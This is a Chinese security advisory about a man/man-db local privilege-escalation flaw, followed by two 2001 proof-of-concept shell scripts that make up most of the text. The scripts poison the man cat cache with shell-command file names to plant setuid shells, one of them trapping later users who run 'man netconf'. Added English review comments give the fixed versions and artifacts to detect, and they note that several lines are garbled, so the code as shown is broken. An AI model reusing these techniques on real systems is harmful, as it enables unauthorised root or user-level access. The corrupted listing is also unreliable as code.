2008-10-13 14:41:55

涉及程序:
man-db
   
描述:
本地用户利用 man 漏洞取得系统特权
   
详细:
近日发现 Linux 的 man 软件包存在漏洞：在某些情况下，man 允许用户自定义 man 查找帮助页的路径，但 man 按用户提供的路径打开帮助页之后，却没有放弃其特权，这可能导致：

1、在 Debian 的 man-db (<= 2.3.17-3.2, 2.3.16-3) 系统上，用户能得到 'man' 用户身份的 setuid shell
2、在 RedHat 的 man (<= man-1.5h1-20) 系统上，用户能执行任意代码，包括得到 root 的 shell


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


#!/bin/sh
###################################################
# Fri Jun 1 23:00:10 JAVT 2001             #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs        #
# proof of concept.                     #
# version affected:                     #
#  <= man-db 2.3.16-3,2.3.17-3.2           #
#                                 #
# tested on:                         #
# debian2.2 -> instant man suidshell         #
#                                 #
# by jenggo                #
#                                 #
# thanx to: echo, mayonaise all @ #karet       #
# ==> Mr.dur,amien,mega,akbar ... damai,damai ;) #
###################################################

# NOTE(review): 2001 proof-of-concept reprinted from a blog post and kept
# byte-for-byte.  Several lines were visibly garbled by the reprint, so the
# listing as shown is not a runnable script; it is annotated below for what
# it demonstrates about the defect, not repaired.
#
# Defect being demonstrated (from the post's own description): the
# privileged man-db binaries open help pages from a search path the calling
# user controls and keep their privileges while doing so.  A symlink in the
# user's directory redirects the formatted-page ("cat") write into the system
# cache /var/cache/man/cat1, and the page name chosen here carries shell
# metacharacters, so the cache entry's file name is itself a command
# sequence that later runs with the man user's privileges.
#
# Defender's view: the fixed versions are named at the end of the post
# (man-db 2.3.18-6 / 2.3.16-4); the durable mitigations are dropping
# privileges before touching user-supplied paths and never passing file
# names through a shell.  Artifacts worth alerting on: entries under
# /var/cache/man/cat1 whose names contain ';' or other shell metacharacters,
# setuid files owned by the man user under /tmp, and a world-writable
# /tmp/mywork holding copies of groff/grotty/troff.

# staging happens under a fixed, predictable /tmp path (made world-writable below)
TMPDIR=/tmp/mywork

# seconds field of the clock, used only to vary the page name
RAND=`/bin/date +%S`
echo "making working dir ..."
/bin/mkdir -p $TMPDIR/man/man1
# mode 777 on the staging directories -- an easy-to-spot artifact
/bin/chmod 777 $TMPDIR
/bin/chmod 777 $TMPDIR/man

echo "copying needed files ..."
# precondition check; nothing in this branch exits, so execution continues
# past it even after "Failed" is printed and the directory is removed
if [ ! -x /usr/bin/groff ]  [ ! -x /usr/bin/grotty ]  [ ! -x /usr/bin/troff ]  [ ! -x /usr/bin/gcc ]; then
echo "Failed, I need executable : groff,grotty,troff,gcc"
echo "cleaning up ..."
/bin/rm -rf $TMPDIR
fi

# private copies of the formatters -- presumably so man still finds them once
# PATH is restricted to $TMPDIR below; confirm against man-db's formatter lookup
/bin/cp /usr/bin/groff $TMPDIR
/bin/cp /usr/bin/grotty $TMPDIR
/bin/cp /usr/bin/troff $TMPDIR

echo "compiling helper ..."
# 'hehe': setreuid(6,6) then exec /bin/sh.  uid 6 is presumably the man
# account (cf. the 'chown man' in mandeb.c below) -- confirm on the target
/bin/cat > $TMPDIR/hehe.c <#include

int main()
{
char *aa[2]={"/bin/sh", NULL};
   
setreuid(6,6);
execve(aa[0], aa, NULL);
exit(0);
}
EOF

/usr/bin/gcc $TMPDIR/hehe.c -o $TMPDIR/hehe 2>/dev/null 1>/dev/null

# 'mandeb': what runs when the poisoned cache file name is evaluated by a
# shell -- copies 'hehe' to /tmp/huhu and makes it setuid man (chown + 4755).
# Note the hard-coded /tmp/mywork rather than $TMPDIR.
/bin/cat > $TMPDIR/mandeb.c <#include

int main()
{
seteuid(6);
setuid(6);
system("/bin/cp /tmp/mywork/hehe /tmp/huhu");
system("/bin/chown man /tmp/huhu");
system("/bin/chmod 4755 /tmp/huhu");
exit(0);
}
EOF

/usr/bin/gcc $TMPDIR/mandeb.c -o $TMPDIR/mandeb 2>/dev/null 1>/dev/null

echo "making our manpage ..."
# the redirection itself: the attacker's cat1 dir is a symlink to the system cat cache
/bin/ln -s /var/cache/man/cat1 $TMPDIR/man/cat1
# the page name embeds a command sequence; a cat file of that name ends up in
# /var/cache/man/cat1 through the symlink above
/bin/echo "bebas euy"/bin/gzip -c > $TMPDIR/man/man1/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls.1.gz"
/bin/touch $TMPDIR/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls"
# presumably man derives its search path from PATH here and so finds
# $TMPDIR/man -- confirm against man-db's manpath logic
export PATH=$TMPDIR
/usr/bin/man "cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls" 2> /dev/null 1>/dev/null

echo "/bin/ls -la /var/cache/man/cat1"
/bin/ls -la /var/cache/man/cat1
# PATH restored (with /var/cache in front)
export PATH=/var/cache:/bin:/sbin:/usr/bin:/usr/sbin

echo "exploiting ..."
/bin/rm -f /tmp/huhu
# the post's claim is that mandb evaluates the poisoned cache file name via a
# shell, running 'mandeb' as the man user -- the step a patched version must
# not perform
/usr/lib/man-db/mandb 2>/dev/null 1>/dev/null
/bin/rm -rf /tmp/mywork

echo
echo "/bin/ls -la /tmp"
/bin/ls -la /tmp

# success indicator: a setuid file under /tmp, expected to be owned by man
if [ -u /tmp/huhu ]; then
echo "file /tmp/huhu is setuid. Hope it's owned by man"
echo "Have a nice day"
echo "[----- jenggo -----]"
/tmp/huhu
else
echo "exploit failed, cleaning up our binary ..."
fi

echo "cleaning up our preparation step dir ..."
# expands to /tmp//tmp/mywork (TMPDIR is already absolute); moot, since the
# directory was already removed above
/bin/rm -rf /tmp/$TMPDIR



#!/bin/sh
###################################################
# Fri May 18 22:08:42 JAVT 2001             #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs        #
# proof of concept.                     #
# version affected:                     #
#  <= man-1.5h1-20                     #
#                                 #
# tested on:                         #
# redhat7.1 -> any user suidshell           #
#                                 #
# by jenggo                #
#                                 #
# thanx to: echo, mayonaise all @ #karet       #
###################################################
# hmmm ... can anyone modify this into an instant root ??

# NOTE(review): 2001 proof-of-concept for the RedHat 'man' package,
# reprinted from a blog post and kept byte-for-byte; some lines were
# garbled by the reprint, so the listing as shown is not runnable.  It is
# annotated for what it demonstrates, not repaired.
#
# Same defect class as the Debian script above: a setgid man binary
# writes formatted pages through a user-controlled symlink into the system
# cat cache, and the resulting cache entry has a file name that embeds a
# command sequence.  Here the payload is left waiting: whoever next runs
# 'man netconf' (see the final message) executes /tmp/mine/manx with their
# own uid, which leaves a setuid /bin/sh wrapper for that uid in /tmp/mine.
#
# Defender's view: the precondition tested below is a setgid/setuid man
# binary -- on a patched or hardened system that test fails.  Artifacts to
# alert on: /tmp/man and /tmp/cat1 directories, a symlink in /tmp/cat1 whose
# target name contains ';', a world-writable /tmp/mine with mode-6755 files
# named my<uid>, and cache entries under /var/cache/man/cat1 with shell
# metacharacters in their names.

# IMPORTANT !
# set this to command that has no man page
DEADLY_BIN="netconf"

# on <= redhat6.2 could be /var/cache/catman
CACHEDIR="/var/cache/man"
CACHEDIR2="/var/cache/catman"

GZ="/bin/gzip"

echo -n "check man dir ..."

# locate the system cat cache, falling back to the older location
if [ ! -d $CACHEDIR ]; then
if [ -d $CACHEDIR2 ]; then
   CACHEDIR=$CACHEDIR2
   echo "OK"
else
   echo "FAILED"
   echo "check your man dir"
   exit
fi
else
echo "OK"
fi

echo -n "checking sgid/suid man ..."
# precondition: a setgid man binary; without it the symlink write has no
# privilege to abuse
if [ ! -g /usr/bin/man ]; then
# is it a debian man?
if [ -d /usr/lib/man-db ]; then
   echo "FAILED"
   echo "I think this is debian style man, use other script"
else
   echo "FAILED"
   echo "can't find executables sgid man binary"
fi
exit
else
echo "OK"
fi

echo "making our man directory ..."
echo

# staging tree in /tmp; /tmp/mine is world-writable so later victims can write into it
mkdir -p /tmp/man/man1
mkdir /tmp/cat1
mkdir /tmp/mine
chmod 777 /tmp/mine

echo "creating our man page ..."
echo

echo "BEBAS EUY"$GZ -c > /tmp/man/man1/huhuy.1.gz

echo "creating symlink ..."
echo

# the attacker's cat dir entry is a symlink to a cache entry whose name embeds a
# command sequence; man's cat-page write will follow it into $CACHEDIR/cat1
ln -s "$CACHEDIR/cat1/netconf.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" /tmp/cat1/huhuy.1.gz

echo "creating our bogus command ..."
echo
touch /tmp/huhuy

echo "making manx shellscript"
echo

# 'manx' is what later runs as the victim: it compiles a /bin/sh wrapper that
# setreuid()s to the victim's uid and marks it mode 6755 under /tmp/mine
/bin/cat > /tmp/mine/manx <#!/bin/sh

export PATH="/bin:/usr/bin:/sbin:/usr/sbin"
VICTIM=\`/usr/bin/id -u\`

/bin/cat >/tmp/mine/my"\$VICTIM".c <#include
void main()
{
char *hh[2]={"/bin/sh", NULL};
setreuid(\$VICTIM,\$VICTIM);
execve(hh[0], hh, NULL);
}
EOG

/usr/bin/gcc /tmp/mine/my"\$VICTIM".c -o /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null

/bin/rm -f /tmp/mine/my"\$VICTIM".c 1>/dev/null 2>/dev/null

chmod 6755 /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null

EOF

chmod 755 /tmp/mine/manx

if [ ! -x /tmp/mine/manx ]; then
echo "file: /tmp/mine/manx can't be set executable !"
echo "fix the exploit first"
echo "cleaning up ..."
/bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
exit
fi

echo "prepare to exploit ..."
echo

# a relative PATH from / -- presumably so man derives /tmp/man as a manual
# directory (with /tmp/cat1 as its cat dir); confirm against man's manpath logic
export PATH=../../../../../../tmp
cd /

echo "exploiting ..."
echo

# the setgid man writes its cat page through the symlink into the system cache
/usr/bin/man -d huhuy 2>/dev/null

export PATH=/bin:/usr/bin

echo "checking our exploit result"
echo

# note: tests the literal /var/cache/man path rather than $CACHEDIR
if [ -f "/var/cache/man/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" ]; then
echo "content of $CACHEDIR/cat1:"
ls -l $CACHEDIR/cat1
echo
echo "exploit OK, now wait till somebody run 'man $DEADLY_BIN'"
echo "and your suidshells will be waiting at /tmp/mine/* "
echo "bye."
echo "[-------- jenggo --------]"
echo
else
echo "hrrmm ... exploit failed to create offending file !"
echo "check again please"
echo "cleaning up ..."
/bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
fi

   
解决方案:
建议用户升级到 man-db 2.3.18-6 或 2.3.16-4。
      